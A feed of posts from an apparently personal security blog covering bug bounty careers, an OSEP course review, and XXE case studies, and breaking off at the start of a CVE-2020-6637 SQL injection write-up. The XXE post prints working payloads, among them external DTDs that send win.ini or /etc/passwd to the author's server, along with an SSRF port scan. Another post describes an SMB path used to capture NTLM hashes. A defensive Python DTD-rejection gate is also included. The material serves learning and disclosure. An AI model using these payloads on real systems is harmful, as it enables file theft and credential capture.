<p>My Cyber Endeavors (<a href="https://cinzinga.com/feed.xml">https://cinzinga.com/feed.xml</a>): A place for me to document my cyber endeavors. Feed generated by Jekyll, 2022-05-25T16:51:32+00:00.</p>
<h1 id="two-years-of-bug-bounty-hunting">Two Years of Bug Bounty Hunting</h1>
<p>cinzinga, 2022-03-31. <a href="https://cinzinga.com/2-Years-Of-Bug-Bounty">https://cinzinga.com/2-Years-Of-Bug-Bounty</a></p>
<p>Two years ago this month, I created my first bug bounty account on Bugcrowd and decided to try my hand at bug bounty hunting for a number of months. As outlined in my earlier article, “100 Days of Bug Hunting”, I initially approached bug bounty as an experiment to determine its legitimacy. That blog post can be found <a href="https://cinzinga.com/Bug-Bounty/">here</a>. Over these last two years I have consistently hunted bugs most days, and throughout this time my approach and methodology have varied greatly. In this blog post I will outline some insights and statistics that I hope you will find interesting.</p>
<h2 id="about-me">About Me</h2>
<p>First, a bit about my background. When I started bug bounty hunting in early 2020, I was a sophomore (second year) in college. However, I was not entirely new to the field of information security and penetration testing. My interest in the topic really kicked off in mid-2019 when I began studying for cyber security certifications such as <a href="https://www.comptia.org/certifications/security">CompTIA’s Security+</a>.</p>
<p>After earning this certification, I discovered the niche world of practical, hands-on certifications. This introduced me to <a href="https://elearnsecurity.com/product/ejpt-certification/">eLearnSecurity’s eJPT</a>, an entry level pentesting certification, which I earned in mid-2019 as well. Shortly after that, I learned about <a href="https://www.offensive-security.com/pwk-oscp/">Offensive Security’s OSCP</a> certification. In late 2019 I earned this certification as well. Finally, in early 2020, I passed <a href="https://elearnsecurity.com/product/ewpt-certification/">eLearnSecurity’s eWPT</a>, an entry level web certification.</p>
<p>In early 2020, March 3rd to be exact, I listened to the Darknet Diaries Podcast episode with dawgyg. This story truly got me interested in bug bounty hunting. At this point, I was tired of taking certifications and wanted to test my tradecraft against real, hardened companies to see if I could hack them. Thus, on March 30th of 2020, I registered on Bugcrowd and HackerOne to begin my bug bounty hunting career.</p>
<h2 id="bug-bounty-pre-requisites">Bug Bounty Pre-Requisites</h2>
<p>My advice for those still in their early days of bug bounty is as follows:</p>
<p>First, some pre-requisites for your hacking journey are an understanding of networking fundamentals. This includes common port numbers, basic subnetting, and different protocols. This information is a cornerstone of any hacker’s education. I highly recommend Professor Messer’s YouTube channel on CompTIA’s Network+.</p>
<p>Next, one should strive to have a decent understanding of the Linux command line and Bash. I personally do not hack with Linux; I use macOS, but many of the command line elements are identical. This will be important for your recon workflow (pipe, redirect, tee, etc.) and the quick installation of tools via the command line.</p>
<p>Next, I would recommend some familiarity with a programming language. You do not have to be proficient, but a general understanding of common operators, methods, etc. is helpful. In addition to this, a basic understanding of HTML/JavaScript will help with web application hacking.</p>
<p>Finally, have some sort of experience hacking web applications. Like I mentioned, I took eLearnSecurity’s eWPT certification. However, this is totally optional: <a href="https://portswigger.net/web-security">PortSwigger’s Web Academy</a> is an even more comprehensive, and FREE, resource to learn web security. Moreover, things like <a href="https://hackerone.com/hacktivity">HackerOne’s Hacktivity</a> and other blog posts are invaluable resources to learn from.</p>
<p>At this point, throw yourself headfirst into bug bounty hunting. Sit down with your web browser and Burp Suite and start hacking. There is no substitute for hands-on-keyboard experience. There are no secret tricks or one-liners or scanning templates that will find you bugs. Success is a function of your time and your effort. Maximize both to maximize success.</p>
<h2 id="my-hacking-style">My Hacking Style</h2>
<p>Looking back over the last two years, I have seen great evolution in how I approach bug bounty hunting. In my blog post about my first 100 days of bug bounty hunting, I mentioned that I requested a 30-day Burp Suite Pro trial and hacked every day for those 30 days until I earned enough for a year’s license. In those early days I would hack 6-8 hours each day.</p>
<p>As my understanding of common web vulnerabilities increased, I found I needed to hack for fewer hours each day. Additionally, the number of private invites I received from my early success allowed me to hack on more exclusive programs, thus requiring less effort to find bugs.</p>
<p>Early on, I would spend large amounts of time hacking on one single program until I understood every page. I understood where every input was reflected on all other pages. This resulted in dozens of XSS vulnerabilities. While some were duplicates, this deep understanding helped me to stand out in this program and eventually score a handful of critical findings. To this day, I still get invited to exclusive programs by this company for my participation early on.</p>
<p>For those starting out, I recommend this approach. Find a program you like and stick to it. It doesn’t matter if you keep churning out duplicates as long as you continue to learn and hone your methodology against this target. One thing I feel many entry-level hunters do is quickly hop to new programs and run standard scanners against them. While this approach can be lucrative for the fastest folks, it will often lead to disappointment and burnout for those who aren’t the fastest.</p>
<p>These days, my strategy for picking targets is generally as follows. I mainly hunt on On-Demand Bugcrowd programs. These are the programs where they tell you a set start date and time in the future so you can be ready at that time to immediately start hacking. These generally have a $10,000 - $15,000 budget and vulnerabilities are paid out on a sliding scale. I find these programs generally have a limited scope and favor manual hacking techniques rather than automation. Additionally, on Synack I am very active hunting on the US-only targets. While I understand not everyone has access to these targets, Synack generally has a good number of fresh targets each week for everyone. Again, Synack heavily emphasizes manual hacking techniques rather than automation and widespread scanning.</p>
<p>In addition to these bug bounty programs, I focus a lot on Bugcrowd’s pentest programs (also known as CPTs and NGPTs). For those who do not know, CPTs are generally 1 - 4-week programs where you are the only tester. However, you are required to submit all vulnerabilities of P1-P5 severity in addition to providing extensive documentation as to what was tested, as well as writing an executive summary. Generally, I have found these programs to pay between $1500 - $5500 depending on the length of the assessment. However, you are not paid per vuln like you would be with a bug bounty program.</p>
<p>Similarly, NGPTs are programs where certified hackers are onboarded to look at an exclusive scope. Sometimes this scope has been in a public bug bounty before, other times it has not. The only notable difference is that with NGPTs you are paid-per-vuln in addition to a flat rate.</p>
<p>Finally, I recently joined the <a href="https://www.cobalt.io/">Cobalt Core</a> just a few months ago. Cobalt places testers on 2-week projects with 1-2 other testers. You are expected to put in ~35 hours of time and in exchange you will receive $1500 per engagement.</p>
<p>These days, as I transition into a full-time job, I am looking for some sustainable long-term options. I find myself gravitating toward CPTs and other “pentest” programs as these are less competitive than traditional bug bounty but provide a steady source of income. Of course, this is personal preference: as I live in the United States, a full-time job is often more lucrative and steadier than bug bounty hunting. This may not be the case for all countries.</p>
<h2 id="some-bug-bounty-phases-to-avoid">Some Bug Bounty Phases to Avoid</h2>
<p>Next up I wanted to talk about some common bug bounty phases you should avoid early on in your career.</p>
<p>First up, avoid spamming low-impact reports such as SPF/DKIM/DMARC or clickjacking. While these reports are sometimes accepted, they generally create a lot of noise and add little value to the client.</p>
<p>Somewhat related to this is vulnerability scanners like nuclei. On public programs it is very doubtful that the public templates will yield any non-duplicate bugs. If you can write your own custom templates for zero or n-days, then nuclei can be very lucrative for farming across all bug bounty programs.</p>
<p>Finally, avoid spamming messages on any platform. This includes platforms like Twitter, where some users tend to beg for the payloads and writeups of others. Similarly, triagers review hundreds of reports each day; repeatedly asking them for updates will not cast a favorable light on you. Be respectful: this is a small community and reputation goes a long way.</p>
<h2 id="personal-statistics">Personal Statistics</h2>
<p>Alright, at this point I will get off my soapbox and do a bit more technical breakdown of my findings. Moving forward I hope to write more technical blogs explaining some of my findings, similar to <a href="https://cinzinga.com/XXE-Case-Studies/">this</a> article.</p>
<h4 id="bugcrowd">Bugcrowd</h4>
<p><img src="/assets/images/2years/1.png" alt="" /></p>
<p><img src="/assets/images/2years/2.png" alt="" /></p>
<p><img src="/assets/images/2years/3.png" alt="" /></p>
<h4 id="synack">Synack</h4>
<p>Statistics on Synack are a bit harder to collect.</p>
<p><img src="/assets/images/2years/4.png" alt="" /></p>
<h1 id="xxe-case-studies">XXE Case Studies</h1>
<p>cinzinga, 2021-07-26. <a href="https://cinzinga.com/XXE-Case-Studies">https://cinzinga.com/XXE-Case-Studies</a></p>
<p>As it has been some time since my last blog post, I decided I would set aside some time to write one now. The topic of this blog post is inspired by a bug I found earlier this morning on a bug bounty program.</p>
<h2 id="xml-external-entity-xxe-attacks">XML External Entity (XXE) Attacks</h2>
<p>I have always been fascinated by XXE attacks, and in this blog, I will outline some of the checks I perform when bug bounty hunting to identify and exploit these vulnerabilities.</p>
<p>While XXE vulnerabilities are rare, they are generally quite easy to exploit. Additionally, they almost always result in a high or critical severity. There are many blogs and resources that talk about what an XXE vulnerability is, so instead I will focus more on examples that I have seen. Unfortunately, I will not be able to share complete walkthroughs as many of these bugs are undisclosed.</p>
<h2 id="case-study-1-strxml-parameter">Case Study #1: strXML Parameter</h2>
<p>When hunting bugs with Burp Suite, I utilize the extension <a href="https://github.com/wagiro/BurpBounty">Burp Bounty</a>. This allows me to create custom passive and active profiles. One of the passive profiles I utilized a while back would look for XML in every HTTP request. Upon finding it, the extension would create an issue for me to investigate manually.</p>
<p><img src="/assets/images/XXE/1.png" alt="" /></p>
<p>This alerted me to quite a fun parameter one day while bug bounty hunting. A recreation of the request is shown below.</p>
<p><img src="/assets/images/XXE/2.png" alt="" /></p>
<p>That’s right, the <code class="language-plaintext highlighter-rouge">strXML</code> parameter simply took raw XML. Interestingly enough, the bulk of it wasn’t even URL encoded! I am not sure how this was a validly formatted HTTP request.
Sadly, I was only able to escalate this finding to an internal port scan via SSRF with a payload similar to the following:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strXML=<?xml version%3D"1.0" encoding%3D"ISO-8859-1"?>
<!DOCTYPE testingxxe [<!ENTITY xxe PUBLIC "xxe" "http://localhost:21/" >
]>
<data>
<xxx>
<xxx>194147</xxx>
</xxx>
<identity>&xxe;</identity>
</data>
</code></pre></div></div>
<p>Then Burp Intruder was used to iterate through the top 1000 ports. The open ports returned a different content-length than closed ports.</p>
<h2 id="case-study-2-xxe-via-proprietary-filetype">Case Study #2: XXE via Proprietary Filetype</h2>
<p>I stumbled upon this next XXE completely by accident. The web site had functionality that allowed users to build “apps”. Apps could be exported to a proprietary file type that I did not recognize. Upon running <code class="language-plaintext highlighter-rouge">strings</code> on one of these files I discovered it was a zip file. Upon unzipping the file, I was greeted by a beautiful sight.</p>
<p><img src="/assets/images/XXE/3.png" alt="" /></p>
<p>Next, I replaced the contents of one of the XML files with the following XXE payload.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE cinzinga SYSTEM "http://poc.cinzinga.com/test.dtd">
<cinzinga>&e1;</cinzinga>
</code></pre></div></div>
<p>And the contents of <code class="language-plaintext highlighter-rouge">/test.dtd</code> hosted on my web server are shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!ENTITY % p1 SYSTEM "file:///windows/win.ini">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://poc.cinzinga.com/?x=%p1;'>">
%p2;
</code></pre></div></div>
<p>Upon zipping the folder back up, and importing this app, I was greeted with the contents of <code class="language-plaintext highlighter-rouge">C:\Windows\win.ini</code> sent to my web server.</p>
<h2 id="case-study-3-xxe-via-kml-file">Case Study #3: XXE via KML File</h2>
<p>I have encountered a number of sites that take more obscure XML file types as input. Multiple times, I have achieved XXE via KML. KML is a type of XML that is specifically used for maps and geographic data.</p>
<p>To exploit these file uploads, I simply download <a href="https://developers.google.com/kml/documentation/KML_Samples.kml">a sample KML file</a> and append an XXE payload in the second line.</p>
<p>To exploit the one I identified today, I made use of a great tool developed by a close friend, <a href="https://twitter.com/0xTib3rius">Tib3rius</a>. The tool can be found <a href="https://github.com/WhiteOakSecurity/Dynamic-DTD">here</a>.</p>
<p>This app is run with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flask run -p <port> -h <interface-ip>
</code></pre></div></div>
<p>And triggered with the corresponding payload:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<server-ip>/malicious.dtd?ext=file:///etc/passwd"> %xxe;]>
</code></pre></div></div>
<p>This promptly resulted in the contents of <code class="language-plaintext highlighter-rouge">/etc/passwd</code> being sent to my web server.</p>
<p><img src="/assets/images/XXE/4.png" alt="" /></p>
<h2 id="case-study-4-xxe-via-pdf-file">Case Study #4: XXE via PDF File</h2>
<p>Thus far in my bug bounty career, I have exploited XXE via PDF upload twice. In both cases, the intended functionality was a Resume upload on a careers subdomain. I can only assume that some backend software was scanning the PDFs to extract key information.</p>
<p>To generate these PDFs, I utilize <a href="https://github.com/StefanMichielse/generate_xxe_payloads">this</a> project on GitHub.</p>
<p>I utilize the following command to generate an XXE PDF payload template.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby oxml_xxe.rb --poc pdf -i 192.168.0.1:8000
</code></pre></div></div>
<p><img src="/assets/images/XXE/5.png" alt="" /></p>
<p>Next, we can open up the output PDF in a text editor to get a better idea of where the payload is rendered. We can see that the XXE payload is inserted on line 27.</p>
<p><img src="/assets/images/XXE/6.png" alt="" /></p>
<p>Personally, the PDF payload I utilize is shown below. I have edited the default payload slightly.</p>
<p><img src="/assets/images/XXE/7.png" alt="" /></p>
<p>The external DTD is the same as the one shown above in this blog.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!ENTITY % p1 SYSTEM "file:///windows/win.ini">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://poc.cinzinga.com/?x=%p1;'>">
%p2;
</code></pre></div></div>
<h2 id="case-study--xxe-via-excel-file">Case Study #?: XXE via Excel File</h2>
<p>While I have not yet obtained XXE via Word or Excel file, it is something I have a payload for and routinely check. There is a great blog <a href="https://www.4armed.com/blog/exploiting-xxe-with-excel/">here</a> that outlines the steps to develop an Excel XXE payload.</p>
<h2 id="conclusion">Conclusion</h2>
<p>While this article was brief, I hope it served to highlight some XXE vulnerabilities that I have exploited in the wild. While the bug type is not common, I have reported approximately a dozen XXE vulnerabilities in my bug bounty career. This number certainly warrants adding XXE checks to your arsenal when assessing a web app’s security.</p>
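<p>Every case study above (the raw <code class="language-plaintext highlighter-rouge">strXML</code> parameter, the zipped app bundle, the KML upload and the PDF resume) has the same root cause: a server-side parser that honours a DOCTYPE and resolves the entities it declares. The defender’s fix is to refuse those constructs before any entity can be fetched. The following is an added example written for this page and not the author’s code; it uses Python’s standard-library expat parser to abort at the first DOCTYPE, entity declaration or external entity reference, then hands only clean documents to <code class="language-plaintext highlighter-rouge">ElementTree</code>. The sample documents are constructed for the demonstration and the host <code class="language-plaintext highlighter-rouge">attacker.invalid</code> is a placeholder, not a real server.</p>

```python
"""Gate for untrusted XML uploads: refuse any document that declares a DTD.

Added example for the XXE case studies above (not the author's code). The
sample documents below are constructed for this demonstration; the host
attacker.invalid is a placeholder, not a real server.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when an upload contains a DOCTYPE, an entity declaration or an
    external entity reference, i.e. the ingredients of every XXE above."""


def assert_no_dtd(data: bytes) -> None:
    """Walk the document with expat and abort at the first DTD construct.

    The handlers fire before any entity is resolved, so a SYSTEM identifier
    pointing at a local file or an attacker-hosted .dtd is never fetched.
    Malformed XML is reported by expat itself (expat.ExpatError).
    """
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE refused (name={name!r}, system_id={system_id!r})")

    def on_entity_decl(entity_name, is_parameter, value, base, system_id,
                       public_id, notation_name):
        raise UnsafeXML(f"entity declaration refused: {entity_name!r}")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference refused: {system_id!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)  # an exception in a handler propagates out of Parse


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse an upload only after it has passed the DTD gate."""
    assert_no_dtd(data)
    return ET.fromstring(data)


def is_safe_xml(data: bytes) -> bool:
    """Boolean wrapper for the gate: True when no DTD construct is present."""
    try:
        assert_no_dtd(data)
    except UnsafeXML:
        return False
    return True


# --- constructed samples -----------------------------------------------------
BENIGN_KML = b"""<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
  <Placemark>
    <name>Sample point</name>
    <Point><coordinates>-122.08,37.42,0</coordinates></Point>
  </Placemark>
</kml>
"""

# Shape of the case-study payloads: an external DTD pulled from a remote host.
EXTERNAL_DTD_KML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE kml SYSTEM "http://attacker.invalid/evil.dtd">
<kml>&e1;</kml>
"""

# Inline internal subset referencing a local file (the single-stage variant).
INTERNAL_SUBSET_XML = b"""<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///windows/win.ini">]>
<data><identity>&xxe;</identity></data>
"""

if __name__ == "__main__":
    root = parse_untrusted_xml(BENIGN_KML)
    print("benign KML parsed, root:", root.tag)
    for label, doc in (("external DTD", EXTERNAL_DTD_KML),
                       ("internal subset", INTERNAL_SUBSET_XML)):
        try:
            parse_untrusted_xml(doc)
        except UnsafeXML as exc:
            print(f"{label}: rejected -> {exc}")
```

<p>Rejecting the DOCTYPE outright is the simplest policy and covers the KML, bundle and PDF-extracted cases alike, since none of those legitimate formats need a DTD. Other parser stacks expose the same knob under a different name, for example the <code class="language-plaintext highlighter-rouge">http://apache.org/xml/features/disallow-doctype-decl</code> feature on a Java <code class="language-plaintext highlighter-rouge">DocumentBuilderFactory</code>; whichever parser handles the upload, the check belongs in front of it, not in the application code that reads the parsed tree.</p>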
<h1 id="osep-pen-300-course-review">OSEP &amp; PEN-300 Course Review</h1>
<p>cinzinga, 2021-03-09. <a href="https://cinzinga.com/OSEP-PEN-300-Review">https://cinzinga.com/OSEP-PEN-300-Review</a></p>
<p>I am proud to have completed Offensive Security’s Evasion Techniques and Breaching Defenses (PEN-300) course. After successfully passing the 48-hour exam, I earned my Offensive Security Experienced Penetration Tester (OSEP) certification. This is currently the most advanced certification in Offensive Security’s penetration testing track.</p>
<h2 id="background">Background</h2>
<p>Prior to starting PEN-300, I had limited Active Directory exploitation experience. Through school, I had set up an AD lab which offered great insight into the structure of a domain. Additionally, I had previously passed Pentester Academy’s Certified Red Team Professional (CRTP). Since I took the version of Penetration Testing with Kali Linux (PWK) that did not include AD attacks (PWKv1), I found CRTP to be the perfect preparation to help bridge the gap between PWKv1 and PEN-300.</p>
<p>As a fun aside, one of the course authors confirmed I was actually the first student to register for PEN-300!</p>
<p><img src="/assets/images/osep/1.png" alt="" /></p>
<h2 id="the-materials">The Materials</h2>
<p>Upon registering for PEN-300, students can expect to receive a ~700-page PDF as well as 19 hours of videos. The syllabus for this course is publicly available on Offensive Security’s site <a href="https://www.offensive-security.com/documentation/PEN300-Syllabus.pdf">here</a>.</p>
<p>Looking through the syllabus, a lot of the topics were very new to me and I worried I would struggle with only 90 days of lab time in addition to being a full-time student. However, I found this course to be structured in a “crawl, walk, run” format, which I greatly enjoyed! Each topic would generally be taught in the following format: history of the technique, theory of the technique, and finally exploitation using the technique. Moreover, the course instructed students on manually coding tools similar to <code class="language-plaintext highlighter-rouge">PsExec.exe</code> and <code class="language-plaintext highlighter-rouge">PowerUpSQL.ps1</code> from scratch in C# to better understand the underlying mechanisms of the attack. While I had minor experience in C/C++ (“Hello World” level), I had never coded in C#. By the end of the course, I was comfortable extrapolating upon the code taught in the course to write my own SQL exploitation tool and undetectable C# shellcode runners.</p>
<p>Once the course moved into some of the more esoteric chapters (Advanced AV Evasion, Kiosk Breakouts, etc.) I found it highly advantageous to watch the videos in addition to following along in the PDF. Generally, the videos are just a narrator reading through the PDF verbatim; however, they have the added benefit of getting to see another person go through the motions. So, if you are a visual learner like me, sometimes it is easier to watch someone use WinDbg rather than reading text instructions on how to use it.</p>
<p>Overall, I found the course materials to be a tremendous reference. While most of the material is nothing new and can be found in many referenced blog posts, I found extreme value in having them all aggregated and distilled down into one PDF reference. Moreover, each chapter had a personal (non-shared) lab to practice the attacks and techniques in. I highly recommend taking the time to create the custom C# code and work through the exercises for each chapter. In addition to this, take the time to try out the “Extra Mile” activities, although be mindful that many of the coding ones can be done on your own time and VM to avoid using up your lab time.</p>
<h2 id="the-labs">The Labs</h2>
<p>In this section I will talk about the six “challenge” labs at the end of the course. These labs are also private so each student does not have to deal with interruptions other students may create in a shared active directory network.</p>
<p>The first three labs are designed to drill specific skills throughout the course. They are very focused and involve 1-2 major techniques so students can practice chaining attacks in a more open environment. With these first three labs, the paths are generally pretty clear, and the emphasis is on improving one’s tradecraft.</p>
<p>Labs four through six are where the student is encouraged to struggle, learn, and overcome more challenging and realistic scenarios. Each scenario challenges students to master new initial foothold and lateral movement techniques while reinforcing the common fundamentals of pivoting and post-exploitation enumeration. Unlike other AD labs I have done, there are no CTF-y games of “find the file” to pivot; the majority of attacks and techniques are covered in the course and improve one’s own knowledge. Make sure you take good notes and understand the “why” each time you get stuck and need to reach out for help or a nudge (join the <a href="https://discord.gg/ABmvaUUEyR">InfoSec Prep discord</a> if you want to chat with other students). The labs are a reasonable and holistic review of all the techniques taught throughout the course; however, they are not all-encompassing.</p>
<h2 id="general-questions">General Questions</h2>
<p>Before I (briefly) talk about the exam and my experience, I will answer some questions asked by friends in the InfoSec Prep discord server.</p>
<p>Q. Overall enjoyment of the course?<br />
A. I loved the course! I found it way more enjoyable than OSCP (perhaps that is because I am more into information security now than I was then?). Regardless, I consider OSCP to be a gateway certification that opens the floodgates to greater learning. This certification was definitely the best that I have taken since my OSCP.</p>
<p>Q. Any Win32 APIs taught in the course?<br />
A. Yes! This course was the first time I had ever heard of the Win32 APIs (I am a Mac user) and it was a nice introduction. The course material certainly gave me enough experience to go forth on my own and interact with these APIs with C# code.</p>
<p>Q. Favorite and least favorite topics?<br />
A. The material such as coding malicious macros and kiosk escapes was definitely the most fun for me, but at the same time probably impractical on many penetration tests. However, I still thoroughly enjoyed it. There were definitely some moments in the AV evasion chapters where it got slow to work through, but in the end the knowledge was invaluable!</p>
<p>Q. What makes PEN-300 a “300” level course compared to PEN-200(PWK)?<br />
A. PWK (PEN-200) is an introductory course to penetration testing. In addition to teaching the basics of many tools (nmap, sqlmap, hashcat, etc.), it teaches students how to think like a penetration tester. By that I mean it teaches students to enumerate, research, enumerate more, and finally exploit. PEN-300 is more advanced than that; it assumes all those initial foothold and privilege escalation skills as a prerequisite. Beyond the course, it encourages students to exercise creativity based off previous research to go forth and pioneer new techniques and vulnerability research. The tools taught in PEN-300 are not timeless, but the techniques are.</p>
<p>Q. How much time and effort was spent on each module?<br />
A. The entire course took me approximately 2 months to get through. I was fortunate to have a lot of time over the holidays (December/January) to work through the material and take detailed notes. While the first 15-16 modules are not strictly AD attacks, I would advise against skipping them to get to the AD stuff faster. A lot of the tradecraft taught in those chapters is important to understanding the course material. Almost everything builds upon the previous chapter, and skipping around willy-nilly is not conducive to a positive learning experience.</p>
<p>Q. Did you have to learn much on your own, outside of the course?<br />
A. Almost nothing! As previously stated, I only did CRTP prior to beginning OSEP. Once I completed all the material in the labs in about 60 of my 90 days, I actually did start HTB’s Offshore labs; however, I did not enjoy it as much. It was also difficult going back to shared labs after being in the PEN-300 labs. Moreover, I enjoyed the explanation that comes with the PEN-300 course materials. I solely relied on my own notes from the PDF, videos, and labs to crack the exam.</p>
<p>Q. Was Meterpreter your go-to payload throughout the course or did you utilize other tools / C2s?<br />
A. Yes! I actually came to love Meterpreter throughout this course. I exclusively used Meterpreter shellcode in my PowerShell and C# shellcode runners. In a future blog post I will outline some of the niche features I discovered in Meterpreter throughout this course!</p>
<p>Q. How did this course fit within the education process of a novice pentester?<br />
A. While I cannot fully answer this question (as I am not a professional pentester), I believe that this course is quality education for any aspiring pentester. It is often said that OSCP will get your foot in the door for pentesting, but I believe this course will get you to the top of the list for pentesting applications. Again, I am still currently a student so I cannot answer this question with full confidence, but this certification certainly will not hurt your career!</p>
<p>Q. 60 versus 90 days?<br />
A. While I completed all of the course work in approximately 60 days, this track is not for everyone. I am currently a college student and I was blessed to have a few weeks off in December/ January that enabled me to swiftly complete the material and labs.</p>
<p>Q. Tell us about your exam experience already!!<br />
A. Okay! Go to the next section.</p>
<h2 id="the-exam">The Exam</h2>
<p>Since this exam is still very new, I am hesitant to talk much about it. However, I will share some brief thoughts as well as statistics from my own attempt. I found the exam to be very fair. That being said, I <em>highly</em> recommend having gone through the PDF and exercises (if not the extra mile exercises) before taking it. Just because an attack is or is not in the labs does not mean it will or will not be in the exam. However, if you understand each attack in the course and each attack in the labs, I have full confidence you can pass the exam. I found the exam to be tough but fair. Moreover, the exam offers multiple ways to pass, a luxury that is not afforded in any of the challenge labs.</p>
<p>Below are some statistics from my own exam attempt:</p>
<ul>
<li>Started at 10AM</li>
<li>Passing points (100pts) in 9 hours</li>
<li>Achieved desired objective (secret.txt) in 10.5 hours</li>
<li>Submitted report (~65 pages) the next day</li>
<li>Received confirmation of pass via email approximately 36 hours after submitting report</li>
</ul>
<p><img src="/assets/images/osep/2.png" alt="" /></p>
<h2 id="conclusion">Conclusion</h2>
<p>Well, I hope you have enjoyed reading about my PEN-300 course and exam experience. If you have any further questions I can be reached via Twitter/ LinkedIn via my links on the left side of this page, otherwise you can find me in the <a href="https://discord.gg/ABmvaUUEyR">InfoSec Prep discord</a> under the username <code class="language-plaintext highlighter-rouge">Homebrewer</code>. Thanks for reading!</p>
<h1>Bug Hunting Thoughts &amp; Statistics</h1>
<p>cinzinga, 2021-02-15, <a href="https://cinzinga.com/Bug-Bounty-Thoughts">https://cinzinga.com/Bug-Bounty-Thoughts</a></p>
<p>Today marks a huge personal milestone in my bug bounty hunting career. I have achieved an all-time ranking of top 100 on Bugcrowd. This accomplishment comes just 11 months after first creating an account on the Bugcrowd platform. In this blog post I will endeavor to highlight a few things I have learned along the way. This blog post will contain some insights into the types and number of bugs I have submitted as well as any miscellaneous tips I think of while writing this.</p>
<h2 id="hack-for-fun">Hack for Fun</h2>
<p>The first point I would like to emphasize is the fun and learning involved in hacking. In my opinion, going into bug hunting with the sole desire to make money is inadvisable. I first started bug hunting after finishing eLearnSecurity’s web application pentester certification and decided I wanted to try hacking on real websites. I’ve learned so much more doing bug hunting than I have in any certification (and as an added bonus I get paid to learn this way rather than paying to learn)!</p>
<h2 id="be-creative">Be Creative</h2>
<p>The next point I want to touch on is creativity. As I have delved deeper into the bug bounty community, I see an evident issue with creativity. What I mean by this is that so many aspiring hunters are focused on finding their first bug that they constantly flock to the newest tool or run the newest “one-liner” they see on Twitter. This is the wrong approach; instead, try thinking outside of the box, fuzz parameters differently, try to break things! Once you make the website act funny you can dig deeper and try to invoke a security issue.</p>
<p>An example of this I’ve encountered is SMB SSRF. Everyone knows the basic premise of SSRF is to induce the web server to make an outbound HTTP request. I was looking at a program with a very tempting <code class="language-plaintext highlighter-rouge">uriPath=</code> parameter but was unable to achieve an HTTP request despite trying numerous bypasses. Out of curiosity I tried <code class="language-plaintext highlighter-rouge">uriPath=\\c2.mk\share</code> and immediately received the Net-NTLMv2 hash from the ASPX server on my VPS running Responder. This is not something I have commonly read about, but I proceeded to find it in six other parameters on this program. They were very clearly blocking outbound HTTP traffic but allowed outbound SMB traffic.</p>
<h2 id="dedication">Dedication</h2>
<p>Bug bounty is no different than anything else in life. You have to work hard if you want to see progress and achieve positive results. There is no such thing as a free lunch: you will have to learn and understand web application attacks and exploits, then you will have to fight and compete with thousands of other bug hunters just to get your first accepted bug. There is no substitute for hard work and hours spent practicing. Sit down and start today if you want to progress tomorrow.</p>
<p>I may add further ramblings here in the future ¯\_(ツ)_/¯</p>
<h2 id="statistic">Statistics</h2>
<p>Alright now for the fun data and statistics. The data and screenshots below are what is required to reach Top 100 on Bugcrowd (at the time of writing this article):</p>
<ul>
<li>Bugs Submitted: 313</li>
<li>Bugs Accepted: 131</li>
<li>Duplicate Bugs: 89</li>
<li>Rejected Bugs: 86 (this is largely due to how Bugcrowd handles NGPT/ CPT engagements)</li>
<li>Pending Bugs: 7</li>
</ul>
<p><img src="/assets/images/bugbounty/1.png" alt="" /></p>
<p>Figure 1: Volume of Submitted Bugs Over Time</p>
<p><img src="/assets/images/bugbounty/2.png" alt="" /></p>
<p>Figure 2: Severity of Submitted Bugs Over Time</p>
<p><img src="/assets/images/bugbounty/3.png" alt="" /></p>
<p>Figure 3: Technical Severity Breakdown</p>
<p><img src="/assets/images/bugbounty/4.png" alt="" /></p>
<p>Figure 4: Number of Submitted Bugs per Category</p>
<p><img src="/assets/images/bugbounty/5.png" alt="" /></p>
<p>Figure 5: Points, Rank, Accuracy</p>
<h1>CVE-2020-6637</h1>
<p>cinzinga, 2020-08-23, <a href="https://cinzinga.com/CVE-2020-6637">https://cinzinga.com/CVE-2020-6637</a></p>
<p>OpenSIS v7.3 is vulnerable to unauthenticated SQL injection via the ‘username’ field; this allows for remote database compromise as well as authentication bypass. The following is a brief write-up of the identification, exploitation, and reporting of <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6637">CVE-2020-6637</a>.</p>
<h2 id="the-software">The Software</h2>
<p><a href="https://en.wikipedia.org/wiki/OpenSIS">Wikipedia</a> describes OpenSIS as the following:</p>
<blockquote>
<p>OpenSIS is one of several free and open source student information systems available to K-12 and higher education institutions. The solution has been in development for several years and appears to have much of the functionality that long time commercial versions have.</p>
</blockquote>
<p>The community edition of the software can be obtained <a href="https://sourceforge.net/projects/opensis-ce/">here</a>.</p>
<p>Selecting software to review for vulnerabilities can be very hit or miss. There are a handful of reasons I decided to look into this software:</p>
<ol>
<li>Written in PHP with a SQL database. This is often a recipe for vulnerabilities.</li>
<li>History of vulnerabilities on <a href="https://www.exploit-db.com/search?q=opensis">Exploit-DB</a>, if bugs existed in the past, more will likely exist in the future.</li>
<li>This software is a school information system. That means it protects a lot of juicy PII and the impact of any bugs is greatly magnified.</li>
</ol>
<h2 id="the-bug">The Bug</h2>
